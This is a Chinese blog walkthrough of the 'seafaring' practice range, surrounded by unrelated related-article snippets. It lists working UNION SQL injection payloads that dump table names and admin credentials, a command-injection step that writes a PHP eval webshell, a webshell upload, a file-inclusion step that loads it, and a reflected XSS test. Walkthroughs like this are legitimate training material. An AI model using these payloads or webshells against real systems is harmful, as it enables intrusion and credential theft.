seafaring靶场漏洞测试攻略

最新推荐文章于 2024-09-14 18:42:05 发布
最新推荐文章于 2024-09-14 18:42:05 发布
阅读量308 收藏 6
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/142219570
版权

进入网页

1.sql注入

测回显点

-1 union select 1,2,3#

 

看数据库

-1 union select 1,2,database()#

 

看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

 

看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

2.命令执行漏洞

输入ls查看

 

输入echo '<?php phpinfo();?>' > a.php 访问a.php 

 

写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

 

使用蚁剑链接

 

3.文件上传漏洞 

使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

 上传一个2.PHP木马文件

访问路径并用蚁剑链接


4.文件包含漏洞

发现关于文件包含

通过访问之前写入的1.php查看,远程文件包含关闭,本地文件可以访问

 

包含之前的1.php一句话木马,访问 

蚁剑链接

5.反射型xss漏洞 

在登录界面输入<script>alert(1)</script>

一身傲骨@
关注
SEAFARING靶场漏洞攻略
2301_81881972的博客
09-13 601
>echo '' > 1.php。
seafaring靶场渗透测试
2301_81525518的博客
09-13 560
进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就order by 有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了。
seafaring寻找漏洞
2301_78031880的博客
09-13 516
(1)下面有一个输入框,输入ls进行查看(2)输入echo '<??>' > qxl.php 并且访问(3)写入一句话木马,并且访问蚁剑连接echo '<??>'>q.php。
SEAFARING靶场渗透
kknifek的博客
09-13 499
??echo '<??
求助 MOR-Tales of seafaring
fsjcondingle的博客
02-09 375
题目大意: 小科经常会听爷爷给他讲述年轻时航海的故事,从一个港口开始航行,经过许多水路,最后到达了另一个港口,每次都能最高效地完成航行。 听多了,小科就开始怀疑爷爷是在吹牛,于是他打算写一个程序,验证爷爷谷故事中的航行能不能完成 故事场景中,有n个港口,m条水路、每条水路连接着2个港口,每个航行故事中会询问两个港口间是否有长度为d的路径(不一定是简单路径),即可以重复走一条边。 输入格式 第一行有三个整数n、m和k(2<=n<=5000, 1<=m<=5000, 1&l
bzoj3137: [Baltic2013]tracks
weixin_30454481的博客
02-23 67
炸一看好像很神仙的样子,其实就是个sb题 万年不见的1A 但是我们可以反过来想,先选一个起点到终点的联通块,然后这联通块后面相当于就能够走了,继续找联通块 然后就能发现直接相邻的脚步相同的边权为0,否则边权为1 直接bfs找最深的层就完事了 #include<cstdio> #include<iostream> #include<cstring>...
[POI2013]MOR-Tales of seafaring
weixin_30586257的博客
07-10 82
题目 思博题,发现一旦路径太长我们可以来回走最后一条边,但是这样并不能改变路径长度的奇偶性 所以求一下所有点之间奇最短路和偶最短路就好了,直接暴力\(BFS\)即可 有一个烦人的特判 代码 #include<bits/stdc++.h> #define mp std::make_pair #define re register inline int read() { ...
[POI2013] MOR-Tales of seafaring
acteu20420的专栏
09-15 164
传送门 简单题意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)。即可以重复走一条边。 思路: 蛮水的叭。我们知道路径可以重复走,所以只要找到一条和d奇偶性相同的最短路,就可以做到了。 因为可以在一条边上不停来来回回,也就是在最短路上加上了一个偶数-->偶数大小任意!!!; 此处应有代码: 1 #include<bi...
BZOJ3417: Poi2013 Tales of seafaring
commonc的博客
05-31 983
题目大意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)   从a到b假如有长度为x的路径,那就可以往回走一步再往前走一步得到长度为x+2的路径 所以可以求出每对点之间的奇数长度最短路和偶数长度最短路,然后判断是否小于d即可 PS: 1.这题卡内存,所以必须离线之后一个点一个点的枚举起点算完之后重新利用内存 2.会有单点不与外界联通并查询这个单点自己之
测试集(2)-words
热门推荐
马如林的IT博客
11-26 5万+
 aa.ma.mabandonabandonabattoirabilityabilityableableabnormalabnormalaboardaboardaboutaboutaboveaboveabracadabraabroadabroadabsenceabsenceabsentabsent
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 419
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
中国海洋大学2022CTF校赛
web13618542420的博客
05-15 304
中国海洋大学2022校赛 质量总的来说还不错,类似于新生赛,偏简单,不过有些题还是很有趣的. http://github.com/tangzichengcc/The_Growth_Path_Of_A_CTFer_And_Pwner 题目的附件放在了我的github项目,有兴趣的朋友可以去做一下 被和谐了好像,在这个项目里 The_Growth_Path_Of_A_CTFer_And_Pwner 文章目录 中国海洋大学2022校赛 web very old php game 你比香农都牛逼 Baby
A Brief History of Humankind — 01 the cognitive revolution
qq_42347617的博客
05-17 2647
1. The Cognitive Revolution 1.1 An Animal of No Significance Word List: Word Interpretation Domain n.域 Kingdom n.界 Phylum n.门 Class n.纲 Order n.目 Family n.科 genus n.“属” 名 speci...
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 375
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2401
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
经典sql题(一)求连续登录不少于三天用户
最新发布
m0_58076578的博客
09-14 819
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 590
输入 -1' union select 1,2,3# 有回显可以查看数据库sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
Sybase「退役」在即,某公共卫生机构如何实现 SAP Sybase 到 PostgreSQL 的持续、无缝数据迁移?
Tapdata 技术博客
09-13 1024
Sybase 暂停维护在即,某公共卫生机构提出了将其关键业务数据从中平稳迁移到 PostgreSQL 的需求。该如何安全、高效实现?
java面试题-Sql 语句的执行顺序
qq_36178165的博客
09-13 477
Sql 语句的执行顺序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值